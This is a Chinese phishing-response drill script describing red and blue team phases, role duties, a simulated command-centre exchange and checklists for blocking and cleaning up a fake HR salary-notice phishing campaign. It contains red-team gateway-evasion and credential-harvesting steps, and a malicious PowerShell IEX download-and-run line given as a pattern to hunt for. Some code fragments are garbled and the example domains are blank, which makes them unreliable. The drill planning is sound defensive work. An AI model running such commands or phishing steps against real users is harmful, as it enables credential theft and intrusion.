内网批量钓鱼邮件拦截处置应急演练脚本_第1页
内网批量钓鱼邮件拦截处置应急演练脚本_第2页
内网批量钓鱼邮件拦截处置应急演练脚本_第3页
内网批量钓鱼邮件拦截处置应急演练脚本_第4页
内网批量钓鱼邮件拦截处置应急演练脚本_第5页
已阅读5页,还剩14页未读 继续免费阅读

付费下载

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

内网批量钓鱼邮件拦截处置应急演练脚本1.演练背景与目标设定本次演练旨在模拟真实场景下,外部攻击者利用社会工程学手段,针对组织内部特定人群发起的批量钓鱼邮件攻击。演练背景设定为攻击者伪造人力资源部门邮箱,发送关于“年度薪酬调整及个税申报专项通知”的钓鱼邮件,诱导员工点击恶意链接输入账号密码或下载带有木马程序的附件。演练的核心目标包括验证邮件网关防护策略的有效性、测试安全运营团队(SOC)对威胁情报的研判能力、考察应急响应小组在批量拦截、处置及溯源过程中的协作效率,以及评估全员安全意识水平。通过高仿真、全流程的实战演练,发现现有防御体系中的盲点,优化应急预案流程,确保在真实攻击发生时能够实现“秒级感知、分钟级阻断、小时级恢复”。2.演练组织架构与角色职责为确保演练有序进行,成立钓鱼邮件应急演练指挥部,下设攻防执行组、应急响应组、技术支撑组、舆情管控组及评估组。各角色职责明确,形成闭环管理。角色分组具体角色主要职责描述演练指挥部总指挥负责演练全过程的决策与指挥,发布启动与终止指令,协调跨部门资源,裁决重大事项。攻防执行组红队队长负责设计钓鱼样本,搭建模拟钓鱼站点,在规定时间窗口发起攻击,并记录攻击成功率和evasion技术。攻击手负责发送钓鱼邮件,规避邮件网关检测,实时监控邮件送达及点击情况,向蓝队提供部分攻击特征用于溯源。应急响应组蓝队队长(SOC主管)统筹应急响应工作,负责事件定级,协调各技术小组进行封堵、清洗和恢复,向指挥部汇报进展。监测分析师实时监控SIEM、邮件网关、终端EDS告警,发现异常流量或行为,第一时间上报并进行初筛。流量分析师分析防火墙及全流量分析设备(NTA)数据,识别恶意C2连接、异常DNS请求,定位受感染主机。终端处置工程师负责隔离感染主机,杀毒木马,重置受损账号密码,恢复终端正常运行。技术支撑组邮件系统运维负责在邮件网关层面实施全局拦截策略,通过SMTP协议回执追溯邮件投递范围,批量删除恶意邮件。网络运维工程师配合防火墙团队在边界侧封禁恶意IP、域名,实施网络微隔离,防止横向渗透。舆情管控组行政/HR对接人负责在演练过程中(如需公开通知或演练穿帮)进行内部安抚与解释,避免引发不必要的恐慌。评估组记录员/观察员全程记录演练时间节点,评估各小组响应速度(MTTD/MTTR),记录处置失误点,撰写最终复盘报告。3.演练前置准备与环境检查在演练正式启动前,需完成技术环境加固、数据备份及工具准备,确保演练活动本身不影响生产业务的连续性,同时保障数据的绝对安全。3.1技术环境准备样本检测验证:红队准备的钓鱼样本(包含恶意链接HTML文件、带宏的Office文档或EXE伪装文件)需在离线沙箱中进行预测试,确认能触发现有杀毒软件但不会被直接查杀至无法发送(模拟真实绕过),同时确保样本不含破坏性代码,仅具备模拟回连功能。数据基线备份:备份演练当天的邮件网关日志、防火墙NAT会话表、核心交换机ARP表以及AD域控制器用户认证日志,以便演练后进行数据对比和痕迹清理。通信渠道建立:建立独立的应急指挥微信群或钉钉群,配置专用语音会议桥,设定应急呼叫电话树,确保演练期间通讯畅通,不受生产网络故障影响。3.2监测策略调优SIEM规则微调:在SIEM系统中临时增加针对本次演练特征的观测规则(如包含特定关键词的邮件主题、指向特定非业务域名的HTTP请求),但关闭自动阻断功能,转为人工审核模式,以检验人工发现能力。终端探针状态:确认全网终端EDR(端点检测与响应)Agent在线率需达到98%以上,确保攻击一旦发生,蓝队能即时接收到终端弹窗告警。3.3演练密令与安全词设定演练专用安全词(如“紫罗兰盛开”),一旦演练过程中出现不可控的生产事故或需立即中止,任一指挥官喊出安全词,全员立即停止演练行为,切换回日常运维模式。4.演练实施详细脚本本次演练分为T0至T5六个阶段,时间跨度设定为4小时,重点考察从攻击发生到业务恢复的全过程。4.1T0阶段:攻击发起与初始潜伏(08:30-09:00)动作描述:红队利用自建SMTP服务器或被劫持的合法邮箱账号,向预设的目标群体(模拟全员)发送钓鱼邮件。邮件主题设定为“【重要】2024年度薪酬结构调整及个税专项扣除确认通知”,发件人显示为“人力资源部-李华”。邮件正文采用高仿真的官方公文格式,包含紧迫感词汇,诱导用户点击“立即查看详情”链接,该链接指向红队搭建的恶意Web站点。红队操作记录:08:30:利用邮件群发工具,向内网2000个测试邮箱地址投递钓鱼邮件。08:32:监测邮件网关日志,确认邮件是否被拦截。如被拦截,调整编码方式或附件特征,尝试绕过(记录绕过耗时)。08:35:邮件成功送达部分用户收件箱(模拟漏网之鱼)。08:40:设置恶意链接响应逻辑,用户点击后弹出虚假登录框,后台开始记录点击者的IP地址、User-Agent及输入的账号密码(模拟数据窃取)。蓝队(SOC)状态:处于日常监测模式,未收到明确攻击预警。评估组开始计时(MTTD:MeanTimeToDetect)。4.2T1阶段:威胁发现与初步研判(09:00-09:20)模拟事件触发:09:05,两名“一线员工”(由评估组扮演)收到邮件后感觉可疑,通过内部安全举报邮箱提交了截图。蓝队响应动作:监测分析师:收到举报邮件,立即提取邮件头(Header)分析发件人IP、SPF/DKIM校验结果。分析细节:发现发件人域名虽然是公司域名,但源IP为境外云主机,SPF记录为SoftFail,属于伪造特征。样本提取:将邮件正文中的链接提取至沙箱进行静态分析,发现链接域名注册时间不足24小时,且与公司官方域名极其相似(如将``伪造为``)。上报机制:监测分析师初步判定为“高疑似批量钓鱼事件”,立即向蓝队队长汇报,并在SIEM系统中创建应急工单,级别定为P2。指令下达:蓝队队长下令启动《钓鱼邮件专项应急预案》,通知流量分析师、终端处置工程师待命。4.3T2阶段:事件定级与紧急处置(09:20-09:50)动作描述:蓝队进一步验证攻击规模,确认已有数十名用户访问了恶意链接,且部分用户输入了密码。此时需立即采取遏制措施。详细处置步骤:步骤执行角色操作细节与命令示例1.确认影响范围监测分析师查询DNS日志或代理服务器日志,搜索访问恶意域名的记录。命令示例:`grep""/var/log/squid/access.log\awk'{print$1}'\sort-u`2.边界封禁网络运维工程师在核心防火墙上配置策略,阻断所有发往恶意C2域名的出站连接,并将源IP(攻击者发送IP)加入黑名单。策略动作:Deny,Log。3.邮件网关拦截邮件系统运维在邮件安全网关(如ExchangeOnlineProtection或自建Postfix)中配置内容过滤策略。规则:若邮件主题包含“薪酬结构调整”或发件人显示名为“人力资源部”且源IP非内网,直接隔离。4.全员通知蓝队队长经指挥部批准,发送全员预警邮件及短信,告知目前正在遭受钓鱼攻击,严禁点击相关邮件,并删除已收到的同类邮件。红队对抗动作:模拟攻击者发现连接中断,尝试更换域名(DGA技术),蓝队需关注是否有新的异常域名解析请求。4.3T3阶段:深度溯源与感染清除(09:50-10:50)动作描述:在遏制措施生效后,转入深度排查阶段,确认是否有主机被植入后门,并对受损账号进行清理。溯源分析流程:终端排查:终端处置工程师通过EDR控制台,检索曾访问恶意链接的终端列表,下发全盘扫描任务。进程分析:针对已点击链接的终端,检查进程树,寻找异常PowerShell进程或WMI订阅行为。技术细节:检查是否存在`powershell.exe-nop-whidden-c"IEX((new-objectnet.webclient).downloadstring('/p'))"`这类恶意命令。账号风险评估:AD域管理员检查是否存在来自异常地理位置的VPN登录或AD账号暴力破解痕迹。对于确认已在钓鱼页面输入密码的账号,强制执行下次登录改密,并重置Multi-FactorAuthentication(MFA)令牌。批量处置操作(模拟脚本):```bash#伪代码示例:批量重置受影响用户密码foreach(us$newPassword=ConvertTo-SecureString-String"Temp@P@ss123!"-AsPlainText-ForceSet-ADAccountPassword-IdentityusUnlock-ADAccount-Identity$user#强制用户下次登录时修改密码Set-ADUser-Identityus}```数据清除:邮件召回:邮件运维工程师利用ExchangePowerShell命令,尝试从所有用户邮箱中检索并删除恶意邮件。命令逻辑:`Search-Mailbox-ResultSizeUnlimited-TargetMailbox"DiscoveryMailbox"-TargetFolder"PhishingCleanup"-SearchQuery'Subject:"薪酬结构调整"'`,确认无误后执行`Delete-Content`(需谨慎操作,提前备份)。4.4T4阶段:业务恢复与加固(10:50-11:30)动作描述:确认威胁已被彻底清除,解除阻断策略,恢复业务正常访问,并进行针对性加固。恢复步骤:1.解除网络隔离:网络运维工程师逐步放通防火墙策略,但仍保留对恶意域名的监控。2.终端解封:EDR确认终端无恶意进程后,解除隔离模式,恢复正常办公网络访问。3.漏洞修补:针对红队利用的邮件网关绕过漏洞(如特定的文件编码evasion),联系厂商升级特征库或临时调整反垃圾邮件等级为“高”。加固措施:在ADFS登录页面增加防钓鱼横幅提示。对全体员工发起针对性的安全意识再培训计划。4.5T5阶段:演练结束与复盘(11:30-12:30)动作描述:总指挥宣布演练结束,各小组汇总数据,进行全流程复盘。数据统计维度:钓鱼邮件发送总数、被拦截数、进入收件箱数(漏过率)。员工点击率(中招率)、账号密码提交率。SOC平均检测时间(MTTD)、平均响应时间(MTTR)。处置过程中出现的操作失误次数(如误删正常邮件、误封正常业务IP)。5.关键场景对话模拟(应急指挥中心)场景:09:25,T2阶段,确认已有大量员工点击链接蓝队队长:目前的态势怎么样?流量分析师,有没有看到大规模的回连?流量分析师:报告指挥,防火墙侧检测到内网有45个IP地址在尝试连接恶意域名``,端口为443。流量特征显示是加密流量,看起来像是心跳包。我已经在边界防火墙上下发了阻断策略,目前回连已被切断。蓝队队长:收到。邮件运维,那个邮件还在往外发吗?能不能在网关层直接掐死?邮件系统运维:正在查。刚才因为规则比较宽泛,第一批漏过去了。我现在已经调整了SMTP网关的ContentFilter策略,把那个发件人指纹和邮件主题特征都加进去了,刚才测试发送,已经被拦截到隔离区。但是……已经进收件箱的邮件怎么处理?蓝队队长:先别急着全员召回,容易误操作。评估组,现在的点击率是多少?评估组:根据红队后台数据,目前点击率是3.5%,大概70个人点了。其中有12个人输入了账号密码。蓝队队长:好,影响面还在可控范围。AD组,立刻把这12个账号在域控上禁用,或者强制改密,别让他们拿去撞库其他系统。终端组,针对这70个IP对应的终端,马上进行隔离,下发烧杀木马的脚本,确认没有驻留。舆情组,准备发全员预警邮件,告诉大家这封邮件是病毒,千万别点,已经点的联系IT热线。总指挥:同意。注意节奏,隔离终端的时候先确认是不是关键业务岗位,如果是财务或ERP服务器的,先人工介入确认,别造成业务停摆。执行吧。6.应急处置关键检查清单为确保演练及实战中的规范操作,特制定以下检查清单,供各小组逐项核对。类别检查项执行状态备注初步研判是否已获取邮件原始头信息?□是□否需包含Received、SPF、DKIM字段是否已提取附件或链接样本?□是□否样本需加密存放在隔离沙箱遏制措施恶意发件人IP/域名是否已在边界封禁?□是□否需覆盖HTTP/HTTPS及SMTP端口邮件网关是否已配置针对性拦截规则?□是□否验证规则是否触发误报受感染终端是否已网络隔离?□是□否断网或通过NAC策略划分至隔离VLAN根除处置受影响账号密码是否已强制重置?□是□否需确保密码强度符合策略终端恶意进程是否已终止并清理?□是□否需检查注册表启动项及计划任务恶意邮件是否已从全员邮箱批量删除?□是□否需抽样验证删除效果恢复验证防火墙策略是否已恢复但保留监控?□是□否避免残留阻断规则影响正常业务业务系统访问功能测试是否正常?□是□否重点测试OA、ERP、邮件系统事后闭环是否已生成详细的事件分析报告?□是□否包含攻击路径溯源图是否已更新安全意识培训课件?□是□否针对本次钓鱼手法进行案例教育7.常见突发情况应对预案在演练过程中,可能会出现超出预期的异常情况,需制定备选方案以保证演练安全。情况一:演练策略误杀正常业务流量现象:防火墙封禁策略配置错误,导致某个核心业务IP段无法访问外网API,业务系统报错。应对:网络运维工程师立即检查防火墙会话表,通过白名单机制临时放行业务流量。蓝队队长记录该误操作,并在演练后重点复盘策略配置的审核流程。情况二:钓鱼邮件被转发给外部客户现象:内部员工误将钓鱼邮件转发给外部合作伙伴邮箱,导致外部域名被拉黑或客户恐慌。应对:舆情管控组立即联系相关客户解释正在进行内部安全测试。如果外部域名已被安全厂商标记为恶意,需联系安全厂商申请申诉解除。情况三:终端EDR掉线无法下发指令现象:部分感染主机因网络环境问题EDR不在线,无法远程隔离。应对:终端处置工程师结合交换机配置,通过ACL(访问控制列表)在接入层交换机端口直接下发物理端口隔离策略,或安排IT人员现场断网处理。8.演练成效评估标准演练结束后,评估组

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论